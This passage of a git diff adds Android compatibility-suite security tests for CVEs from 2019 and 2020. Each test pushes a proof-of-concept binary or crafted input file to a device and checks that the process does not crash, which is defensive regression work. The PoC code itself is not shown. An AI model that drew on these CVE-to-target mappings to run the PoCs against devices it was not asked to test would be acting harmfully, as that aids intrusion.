+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2040 extends SecurityTestCase {
+
+ /**
+ * b/122316913
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-04")
+ @Test
+ public void testPocCVE_2019_2040() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2040", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
new file mode 100644
index 0000000..6072d12
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2044.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2044 extends SecurityTestCase {
+
+ /**
+ * b/123701862
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-05")
+ @Test
+ public void testPocCVE_2019_2044() throws Exception {
+ pocPusher.only32();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2044", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java
new file mode 100644
index 0000000..783bfa1
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2046.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2046 extends SecurityTestCase {
+
+ /**
+ * b/117556220
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-05")
+ @Test
+ public void testPocCVE_2019_2046() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runProxyAutoConfig("cve_2019_2046", "true", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
new file mode 100644
index 0000000..e20bb5c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2099.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2099 extends SecurityTestCase {
+
+ /**
+ * b/123583388
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ **/
+ @SecurityTest(minPatchLevel = "2019-06")
+ @Test
+ public void testPocCVE_2019_2099() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2099", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
new file mode 100644
index 0000000..38c8be0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2115.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2115 extends SecurityTestCase {
+
+ /**
+ * b/129768470
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2019-09")
+ @Test
+ public void testPocCVE_2019_2115() throws Exception {
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2115", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
new file mode 100644
index 0000000..6833243
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2135.java
@@ -0,0 +1,40 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2135 extends SecurityTestCase {
+
+ /**
+ * b/125900276
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-08")
+ @Test
+ public void testPocCVE_2019_2135() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE_2019_2135", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
new file mode 100644
index 0000000..20396ac
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2206.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2206 extends SecurityTestCase {
+
+ /**
+ * b/139188579
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2206() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2206", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
new file mode 100644
index 0000000..6f4340c
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2019_2207.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2019_2207 extends SecurityTestCase {
+
+ /**
+ * b/124524315
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2019-11")
+ @Test
+ public void testPocCVE_2019_2207() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2207", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
new file mode 100644
index 0000000..efd1e54
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0006.java
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0006 extends SecurityTestCase {
+
+ /**
+ * b/139738828
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-01")
+ @Test
+ public void testPocCVE_2020_0006() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0006", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
new file mode 100644
index 0000000..e624134
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0037 extends SecurityTestCase {
+
+ /**
+ * b/143106535
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-03")
+ @Test
+ public void testPocCVE_2020_0037() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
new file mode 100644
index 0000000..5731c12
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0038 extends SecurityTestCase {
+
+ /**
+ * b/143109193
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-03")
+ @Test
+ public void testPocCVE_2020_0038() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
new file mode 100644
index 0000000..7d5ae37
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0039 extends SecurityTestCase {
+
+ /**
+ * b/143155861
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-03")
+ @Test
+ public void testPocCVE_2020_0039() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
new file mode 100644
index 0000000..79826e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.compatibility.common.util.CrashUtils;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0073 extends SecurityTestCase {
+
+ /**
+ * b/147309942
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2020-04")
+ @Test
+ public void testPocCVE_2020_0073() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2020-0073";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java
new file mode 100644
index 0000000..4cd94c9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import java.util.Arrays;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0224 extends SecurityTestCase {
+
+ /**
+ * b/147664838
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-07")
+ @Test
+ public void testPocCVE_2020_0224() throws Exception {
+ AdbUtils.runProxyAutoConfig("cve_2020_0224", getDevice());
+ AdbUtils.assertNoCrashes(getDevice(), new CrashUtils.Config()
+ .setProcessPatterns("pacrunner")
+ .checkMinAddress(false)
+ .appendSignals(CrashUtils.SIGABRT));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0240.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0240.java
new file mode 100644
index 0000000..352274e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0240.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0240 extends SecurityTestCase {
+
+ /**
+ * b/150706594
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-08")
+ @Test
+ public void testPocCVE_2020_0240() throws Exception {
+ String inputFiles[] = {"cve_2020_0240.pac"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0240",
+ AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
new file mode 100644
index 0000000..4c2b91d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0243 extends SecurityTestCase {
+
+ /**
+ * b/151644303
+ * Vulnerability Behaviour: SIGSEGV in mediaserver
+ */
+ @SecurityTest(minPatchLevel = "2020-08")
+ @Test
+ public void testPocCVE_2020_0243() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2020-0243", getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns("mediaserver");
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
new file mode 100644
index 0000000..2d5237a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0381 extends SecurityTestCase {
+
+ /**
+ * b/150159669
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0381() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0381.xmf", "cve_2020_0381.info"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0381",
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
new file mode 100644
index 0000000..2e1ca03
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
@@ -0,0 +1,42 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0383 extends SecurityTestCase {
+
+ /**
+ * b/150160279
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0383() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0383.xmf", "cve_2020_0383.info"};
+ String binaryName = "CVE-2020-0383";
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(binaryName,
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
new file mode 100644
index 0000000..2f7b5d9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0384 extends SecurityTestCase {
+
+ /**
+ * b/150159906
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0384() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0384.xmf", "cve_2020_0384.info"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0384",
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
new file mode 100644
index 0000000..e7aefeb
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
